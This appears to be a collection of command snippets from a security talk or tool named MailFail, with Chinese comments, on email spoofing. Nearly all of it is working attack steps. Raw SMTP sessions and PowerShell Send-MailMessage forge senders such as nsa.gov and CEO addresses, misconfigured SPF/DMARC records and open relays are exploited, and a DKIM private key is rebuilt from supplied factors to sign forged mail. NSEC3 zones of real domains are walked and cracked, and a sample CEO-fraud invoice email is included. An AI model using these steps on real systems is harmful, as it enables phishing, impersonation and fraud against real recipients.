MailFail

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

dig MX {{TODO}} +short
telnet {{ TODO }} 25
HELO nsa.gov
MAIL FROM: <jack@nsa.gov>
RCPT TO: {{ TODO }}
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: security@nsa.gov
To: {{ TODO }}
Subject: Snowden

--NextMimePart
Content-type: text/html;

We forgive you :(
.

1
2

dig MX ilebi.com +short
Send-MailMessage -SmtpServer 96-126-99-62.ip.linodeusercontent.com -To ytt50349@ilebi.com -From jack@harvard.edu -Subject "Congrats!" -Body "You've been accepted!" -BodyAsHTML

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

dig TXT spf.m.ail.fail +short
curl ifconfig.me

telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <jack@billyjoel.com>
RCPT TO: <mymailfail42@proton.me>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: jack@billyjoel.com
To: mymailfail42@proton.me
Subject: Piano Man
Message-ID: <unique-message-id@example.com>

--NextMimePart
Content-Type: text/html;

Sing us a song.
.

1
2
3
4
5
6
7
8

openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:1024 -out dkim_1024_private.pem
openssl rsa -pubout -in dkim_1024_private.pem -out dkim_1024_public.pem
cat dkim_1024_public.pem
dig TXT dkim1024._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
wget https://gist.githubusercontent.com/ACK-J/76585af46375641ec841cb6b77d345c3/raw/e52f1a8ae9f83dd080d7a75e27d505dff5350d9b/Send_DKIM_Email.py
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

dig TXT smtpapi._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/487d0de5737458d953ca818a0645b09b
wget https://gist.githubusercontent.com/ACK-J/487d0de5737458d953ca818a0645b09b/raw/817e9d3c0faeb81844a4a81be6818d582ff493ea/Reconstruct_Private_RSA_Key.py
# 私钥值 p 和 q
# 114243475724741248833595122844512882880944338610909134738011440161029226847479
# 98382782872834099683871479139393781262822034994021043042450594450215266838447
vim Reconstruct_Private_RSA_Key.py
python3 Reconstruct_Private_RSA_Key.py
cat > cracked_private_key.pem
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.py

1

https://gist.github.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

# 这是一个检查 SMTP 开放中继的网站
https://tools.appriver.com/OpenRelay.aspx?server=209.38.78.151

# 安装 postfix 开放中继
sudo apt install postfix
sudo nano /etc/postfix/main.cf
# 添加以下行
mynetworks = 0.0.0.0/0 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
permit_mynetworks = yes
# 重启 postfix
sudo service postfix restart

# 使用 Nmap 扫描开放中继
nmap -p 25,587,465 -v --open --script smtp-open-relay 209.38.78.151 | grep "Server is an open relay|MAIL FROM:" -B 6

# 使用开放中继
telnet 209.38.78.151 25
HELO smtprelay.me
MAIL FROM: <jack@smtprelay.me>
RCPT TO: <mymailfail42@gmail.com>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: jack@smtprelay.me
To: mymailfail42@gmail.com
Subject: Did that invoice go out?

--NextMimePart
Content-Type: text/html;

Hey Mike, this is Jack, your CEO. Did you ever send out that invoice for the holiday party?
If not, here are the routing numbers:
1234567890

I've attached the invoice for your convenience. You should get this done ASAP, or it will affect your performance review.

Sincerely,
Your Boss
.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

dig TXT smtpapi._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/487d0de5737458d953ca818a0645b09b
wget https://gist.githubusercontent.com/ACK-J/487d0de5737458d953ca818a0645b09b/raw/817e9d3c0faeb81844a4a81be6818d582ff493ea/Reconstruct_Private_RSA_Key.py
# 私钥值 p 和 q
# 114243475724741248833595122844512882880944338610909134738011440161029226847479
# 98382782872834099683871479139393781262822034994021043042450594450215266838447
vim Reconstruct_Private_RSA_Key.py
python3 Reconstruct_Private_RSA_Key.py
cat > cracked_private_key.pem
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

# 下载检查 DMARC 和 SPF 错误配置的脚本
wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
# 下载前一百万个域名的文件
wget https://downloads.majesticseo.com/majestic_million.csv
# 格式化文件
cat  majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
# 使用格式化后的文件运行脚本
python3 DMARC_and_SPF_Check.py majestic_million.csv.txt

# 显示域的 SPF 记录指向我当前的 IP 地址
dig TXT spf.m.ail.fail +short
# 显示我当前的 IP
curl ifconfig.me

# 连接到 Proton Mail 的邮件服务器
# 欺骗 SPF
# 利用域的错误配置的 SPF 和 DMARC 记录
telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <jack@spf.m.ail.fail>
RCPT TO: <mymailfail42@proton.me>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
To: mymailfail42@proton.me
From: vader@starwars.com
Subject: Your Inbox Has Fallen to the Dark Side

--NextMimePart
Content-Type: text/html;

I find your email habits... disturbing.

Effective immediately:

- "Free lightsaber!" will trigger a full investigation by the Empire.

May the inbox be with you.

Darth Vader

Sith Lord & Email Administrator

.

1
2
3
4

# 使用 portal.azure.com 打开云 shell
# 获取受害者域的 MX 记录，并替换下面的 SMTP 服务器
# 如果你的 IP 被 Spamhaus 阻止，重启云 shell 获取新 IP
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To "Victim@example.com" -From "ceo@BadDMARC.com" -Subject "Misconfigured DMARC" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

# 下载检查 DMARC 和 SPF 错误配置的脚本
wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
# 下载前一百万个域名的文件
wget https://downloads.majesticseo.com/majestic_million.csv
# 格式化文件
cat  majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
# 检查 DMARC 策略中包含 pct= 的域
python3 DMARC_and_SPF_Check.py majestic_million.csv.txt | grep "less than 100%"

# 一种简单的发送欺骗邮件的方法是使用 portal.azure.com 上的 Cloud Shell

# 替换下面的 SMTP 服务器和受害者邮箱
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To victim@example.com -From jack@epicgames.com -Subject "Howdy" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl

1
2

# 将 SMTP 服务器替换为 M365 MX 记录，并替换 To 和 From 字段
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To victim@vulnerable.com -From ceo@vulnerable.com -Subject "Microsoft Direct Send Spoofing Test" -Body "Microsoft Direct Send Spoofing Test" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl

1
2
3
4
5
6
7
8

# 安装依赖
sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
# 使用 pipx 安装 n3map
pipx install n3map[predict]
# NSEC 遍历 Stanford
n3map -v -A --output www.stanford.edu.zone stanford.edu
# 查看结果
vim www.stanford.edu.zone

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

# 安装依赖
sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
# 使用 pipx 安装 n3map
pipx install n3map[predict]
# NSEC3 遍历 nsa.gov
n3map -v -A --output nsa.gov.zone nsa.gov --predict
# 查看结果
vim nsa.gov.zone
# 将结果转换为 hashcat 格式
n3map-hashcatify nsa.gov.zone nsa.gov.hashcat
# 使用 hashcat 破解子域
hashcat --potfile-disable -m 8300 nsa.gov.hashcat /opt/wordlists/goldmine-2024-small.txt

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

# 显示域的 SPF 记录指向我当前的 IP 地址
dig TXT spf.m.ail.fail +short
# 显示我当前的 IP
curl ifconfig.me

# 连接到 protonmail 的 SMTP 服务器
# 欺骗 SPF
# 包含一个带有不同邮件的 Reply-To: 标头
telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <jack@spf.m.ail.fail>
RCPT TO: <mymailfail42@proton.me>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
To: mymailfail42@proton.me
Reply-To: vader@starwars-corp.com
From: vader@starwars.com
Subject: Your Inbox Has Fallen to the Dark Side

--NextMimePart
Content-Type: text/html;

I find your email habits... disturbing.

Effective immediately:

- "Free lightsaber!" will trigger a full investigation by the Empire.

May the inbox be with you.

Darth Vader

Sith Lord & Email Administrator

.